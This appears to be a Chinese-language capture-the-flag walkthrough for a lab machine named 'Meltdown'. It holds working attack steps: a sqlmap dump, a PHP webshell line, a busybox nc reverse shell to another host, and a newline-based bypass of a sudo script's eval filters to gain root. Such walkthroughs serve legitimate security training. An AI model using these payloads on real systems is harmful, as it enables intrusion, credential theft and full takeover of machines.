Meltdown

信息搜集

192.168.100.42

端口扫描

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.42                                                       [10:44:49]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.42:22
Open 192.168.100.42:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-16 10:44 CST
Initiating ARP Ping Scan at 10:44
Scanning 192.168.100.42 [1 port]
Completed ARP Ping Scan at 10:44, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:44
Completed Parallel DNS resolution of 1 host. at 10:45, 6.57s elapsed
DNS resolution of 1 IPs took 6.58s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 10:45
Scanning 192.168.100.42 [2 ports]
Discovered open port 22/tcp on 192.168.100.42
Discovered open port 80/tcp on 192.168.100.42
Completed SYN Stealth Scan at 10:45, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.100.42
Host is up, received arp-response (0.00060s latency).
Scanned at 2026-01-16 10:45:02 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:3C:E2:ED (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.73 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

‍

80/tcp扫描

http://192.168.100.42/item.php?id=1

存在sql注入

1	sqlmap -u http://192.168.100.42/item.php\?id\=1 --dump

得到登录凭证

‍

/rin_profile.php可以更新商品介绍，尝试写入webshell

1	system($_POST['cmd']);

‍

提权

www shell

反弹shell

1	busybox nc 192.168.100.44 7777 -e /bin/bash

‍

www -> rin

在opt目录下存在rin的登录凭证

‍

rin -> root

rin用户存在sudo权限

sudo -l

/opt/repeater.sh可以以 root 用户身份执行后面的命令

rin@meltdown:/opt$ cat /opt/repeater.sh
#!/bin/bash

main() {
    local user_input="$1"

    if echo "$user_input" | grep -qE '[;&|`$\\]'; then
        echo "错误：输入包含非法字符"
        return 1
    fi

    if echo "$user_input" | grep -qiE '(cat|ls|echo|rm|mv|cp|chmod)'; then
        echo "错误：输入包含危险关键字"
        return 1
    fi


    if echo "$user_input" | grep -qE '[[:space:]]'; then
        if ! echo "$user_input" | grep -qE '^[a-zA-Z0-9]*[[:space:]]+[a-zA-Z0-9]*$'; then
            echo "错误：空格使用受限"
            return 1
        fi
    fi


    echo "处理结果: $user_input"


    local sanitized_input=$(echo "$user_input" | tr -d '\n\r')
    eval "output=\"$sanitized_input\""
    echo "最终输出: $output"
}

if [ $# -ne 1 ]; then
    echo "用法: $0 <输入内容>"
    exit 1
fi

main "$1"

‍

第一层过滤

1
2
3

if echo "$user_input" | grep -qE '[;&|`$\\]'; then
       echo "错误：输入包含非法字符"
       return 1

检查是否包含以下危险字符之一：

; 命令分隔
& 后台执行
| 管道
` 命令替换（反引号）
$ 变量引用
\ 转义符

‍

第二层过滤

if echo "$user_input" | grep -qiE '(cat|ls|echo|rm|mv|cp|chmod)'; then
    echo "错误：输入包含危险关键字"
    return 1
fi

不区分大小写（-i）检查是否包含这些单词cat ls echo rm mv cp chmod

‍

第三层过滤

    if ! echo "$$   user_input" | grep -qE '^[a-zA-Z0-9]*[[:space:]]+[a-zA-Z0-9]*   $$'; then
        echo "错误：空格使用受限"
        return 1
    fi
fi

允许特定格式的空格， “字母 / 数字 + 至少一个空白字符 + 字母 / 数字” 的格式

‍

payload

这一方法之所以奏效，是因为可以利用双引号（”）对 eval 语句进行转义。因此，我们首先对 eval 进行转义处理，随后通过换行符（并附带一个空格 —— 因为脚本中会过滤掉空格）传入我们的恶意命令，最后闭合双引号和单引号，以避免出现任何语法错误。

1
2
3

sudo /opt/repeater.sh '"
 bash
"'

‍

查看完整的执行流程

1
2
3

bash -x repeater.sh '"
 bash
"'

‍

当然也可以反弹shell

busybox nc 192.168.100.44 7777 -e /bin/bash

sudo /opt/repeater.sh '"
 busybox
 nc
 192
.
168
.
100
.
44
 7777
 -
e
 bash	
"'

‍